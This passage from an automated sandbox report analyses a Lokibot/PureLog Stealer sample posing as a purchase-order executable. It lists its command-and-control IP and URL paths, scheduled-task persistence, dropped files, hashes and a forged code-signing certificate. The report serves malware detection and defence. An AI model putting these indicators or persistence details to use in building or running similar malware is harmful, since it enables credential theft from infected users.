                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO-0Y9005373R664.exe, 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VvtddClQv.exe, 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.chiark.greenend.org.uk/~sgtatham/putty/0PO-0Y9005373R664.exe, VvtddClQv.exe.0.drfalse
                        • URL Reputation: safe
                        unknown
                        http://www.ibsensoftware.com/VvtddClQv.exe, VvtddClQv.exe, 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        104.248.205.66
                        unknownUnited States
                        14061DIGITALOCEAN-ASNUStrue
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1501076
                        Start date and time:2024-08-29 12:01:16 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 21s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:19
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:PO-0Y9005373R664.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@19/17@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 97%
                        • Number of executed functions: 120
                        • Number of non-executed functions: 14
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        TimeTypeDescription
                        06:02:42API Interceptor45x Sleep call for process: PO-0Y9005373R664.exe modified
                        06:02:47API Interceptor35x Sleep call for process: powershell.exe modified
                        06:02:51API Interceptor1x Sleep call for process: VvtddClQv.exe modified
                        12:02:49Task SchedulerRun new task: VvtddClQv path: C:\Users\user\AppData\Roaming\VvtddClQv.exe
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        104.248.205.66file.exeGet hashmaliciousLokibotBrowse
                        • 104.248.205.66/index.php/pages?id=281164463123697
                        3HyQ3UqWop.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                        • 104.248.205.66/index.php/posts.php?8=1
                        T#U00f6r#U00f6lt fizet#U00e9si megb#U00edz#U00e1s.cmd.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                        • 104.248.205.66/index.php/modify.php?edit=1
                        SecuriteInfo.com.Win32.PWSX-gen.6895.26796.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                        • 104.248.205.66/index.php/edit.php?name=1
                        FedEx_AWB#53052032046.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                        • 104.248.205.66/index.php/edit.php?name=1
                        b684fa6621ac71f22449614bfe6064d3cc91fd7aeb3c8d16fb6d586947c85bc3_payload.exeGet hashmaliciousLokibotBrowse
                        • 104.248.205.66/index.php/posts.php?8=1
                        FedEx_AWB#53053132046.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                        • 104.248.205.66/index.php/edit.php?name=1
                        DHL Receipt_27248791029.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                        • 104.248.205.66/index.php/posts.php?8=1
                        Request For Quote (Kobelco) INV#180222OM24 & #160222OM71.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                        • 104.248.205.66/index.php/pages?id=281164463123697
                        jnaBWnyCez.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                        • 104.248.205.66/index.php/modify?file=1
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        DIGITALOCEAN-ASNUShttps://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1EGet hashmaliciousUnknownBrowse
                        • 104.248.15.35
                        https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1EGet hashmaliciousUnknownBrowse
                        • 104.248.15.35
                        https://1113a6f.netsolhost.com/Get hashmaliciousUnknownBrowse
                        • 138.197.61.175
                        http://pub-3a8cf82f2ab64d7aad1bd2333443f1dc.r2.dev/newdoc.htmlGet hashmaliciousUnknownBrowse
                        • 67.205.136.183
                        http://linkplea.se/doarGet hashmaliciousUnknownBrowse
                        • 165.22.250.235
                        http://leembal.com.mxGet hashmaliciousUnknownBrowse
                        • 157.230.60.69
                        https://pub-6a08b05596ae4c139f14fc7b92eb075c.r2.dev/NewOneDrive78.htmlGet hashmaliciousUnknownBrowse
                        • 157.245.69.91
                        582czwg1Jl.exeGet hashmaliciousUnknownBrowse
                        • 95.85.16.212
                        https://interprimesolutions.com/imp/ns/?hg=vndankxgbdow&vn=ujdgsmfdd2RjQGFsLmNvbQ=Get hashmaliciousUnknownBrowse
                        • 157.230.22.210
                        http://conrasty.pro/rd/4GZfNu661Wcuf128ryymsulvqg219KJAPMAHPZPNXNLR15619WARW973R13Get hashmaliciousPhisherBrowse
                        • 159.203.57.37
                        No context
                        No context
                        Process:C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.34331486778365
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                        Malicious:true
                        Reputation:high, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                        Process:C:\Users\user\AppData\Roaming\VvtddClQv.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.34331486778365
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                        Malicious:false
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2232
                        Entropy (8bit):5.380805901110357
                        Encrypted:false
                        SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
                        MD5:16AD599332DD2FF94DA0787D71688B62
                        SHA1:02F738694B02E84FFE3BAB7DE5709001823C6E40
                        SHA-256:452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
                        SHA-512:A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
                        Malicious:false
                        Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1582
                        Entropy (8bit):5.110860658719488
                        Encrypted:false
                        SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtnxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTxv
                        MD5:D94CF456F827040D51B15D86759578BF
                        SHA1:2B238E094B110ECDAB68AA7F10D3542FC939F3AE
                        SHA-256:D6773C572ECD5142FFE0DB736813309C2E2E6E8593D214D5C66C52FDAE2853E7
                        SHA-512:16E30A67155B64D692BCF3B8E8C14EC98E98832670C4F281EE790BCDE25ED4DD66C91D8BC240B3AA43428ADBF3EC6D90477BB94EF24D5332FF137D8DE7EF6CCA
                        Malicious:true
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                        Process:C:\Users\user\AppData\Roaming\VvtddClQv.exe
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1582
                        Entropy (8bit):5.110860658719488
                        Encrypted:false
                        SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtnxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTxv
                        MD5:D94CF456F827040D51B15D86759578BF
                        SHA1:2B238E094B110ECDAB68AA7F10D3542FC939F3AE
                        SHA-256:D6773C572ECD5142FFE0DB736813309C2E2E6E8593D214D5C66C52FDAE2853E7
                        SHA-512:16E30A67155B64D692BCF3B8E8C14EC98E98832670C4F281EE790BCDE25ED4DD66C91D8BC240B3AA43428ADBF3EC6D90477BB94EF24D5332FF137D8DE7EF6CCA
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                        Process:C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):47
                        Entropy (8bit):1.168829563685559
                        Encrypted:false
                        SSDEEP:3:/lSll/:AV
                        MD5:FEEA5AAD375F1E916BF7E620A6DCD75B
                        SHA1:94894605A205FFA9C0FD5D9BE23603C2AFEA3CF9
                        SHA-256:D94B1765B6165ACCEA18A12F7DD87FA28A6964E8B3C709967B82DFF961DFF216
                        SHA-512:E8A16FF53A2904A6BF0C20910ADF544BF73D7370B012C57A2CA05FC40C7DBFF9622691DF99310E6F131E203B49EAF525737A38CDFCDE817A4B601F71B10861E2
                        Malicious:false
                        Preview:........................................user.
                        Process:C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):606216
                        Entropy (8bit):7.794779696437517
                        Encrypted:false
                        SSDEEP:12288:DX1RiTnbj8dvtMgnwyY1zepMXfe2VrPfHCEL2wFikR:DXaTnb0tMx1CpMXGifHCEpFR
                        MD5:8C71713FD5663BCBE87118FC47DE3EC5
                        SHA1:059FD7D974E27726130B662AF7CB5F45BAC388B5
                        SHA-256:A977AFA9D254B586F73B50EED60BE03E124CEE9BF9B1DA069DC7D5FBCD24222B
                        SHA-512:A498427376A4965D7F3F47982A96F92103D3FE57B3CC46B52B1F1A6B39187CBA5B324CAE7ABE1D76722CE1B56F8987D2DE18D3F8A1DD82A53AAC28E940E993C3
                        Malicious:true
                        Yara Hits:
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe, Author: Joe Security
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 53%
                        • Antivirus: Virustotal, Detection: 59%, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....IK...............0.............n.... ... ....@.. .......................`............@................................. ...K.... ...................6...@....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................P.......H........H...m..........\....e...........................................0..........(x...8....(....8......}....8.....(.... ....8....8........E........|..."...........*...v...........J...(...........=...y...................g...8......8o... ....8....... .....:....&8}.....{.... ~...(....o.... ....8a.....{.... 6...(....(.... .....9@...& ....85..... H...(y...(.... ....8......{.....{....(....o.... .....:....& ....8......{....r...p(.... .....9....&8......{.... *...(....(.... ....8..
                        Process:C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Preview:[ZoneTransfer]....ZoneId=0
                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.794779696437517
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        • Win32 Executable (generic) a (10002005/4) 49.97%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:PO-0Y9005373R664.exe
                        File size:606'216 bytes
                        MD5:8c71713fd5663bcbe87118fc47de3ec5
                        SHA1:059fd7d974e27726130b662af7cb5f45bac388b5
                        SHA256:a977afa9d254b586f73b50eed60be03e124cee9bf9b1da069dc7d5fbcd24222b
                        SHA512:a498427376a4965d7f3f47982a96f92103d3fe57b3cc46b52b1f1a6b39187cba5b324cae7abe1d76722ce1b56f8987d2de18d3f8a1dd82a53aac28e940e993c3
                        SSDEEP:12288:DX1RiTnbj8dvtMgnwyY1zepMXfe2VrPfHCEL2wFikR:DXaTnb0tMx1CpMXGifHCEpFR
                        TLSH:BDD4F11BB7959F00C28C9975C2D7802503FA9A832736D75F3B8A52C969823F55C8E7CE
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....IK...............0.............n.... ... ....@.. .......................`............@................................
                        Icon Hash:00928e8e8686b000
                        Entrypoint:0x491e6e
                        Entrypoint Section:.text
                        Digitally signed:true
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0xFB4B49A3 [Wed Aug 8 11:21:07 2103 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                        Signature Valid:false
                        Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                        Signature Validation Error:The digital signature of the object did not verify
                        Error Number:-2146869232
                        Not Before, Not After
                        • 13/11/2018 01:00:00 09/11/2021 00:59:59
                        Subject Chain
                        • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                        Version:3
                        Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                        Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                        Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                        Serial:7C1118CBBADC95DA3752C46E47A27438
                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
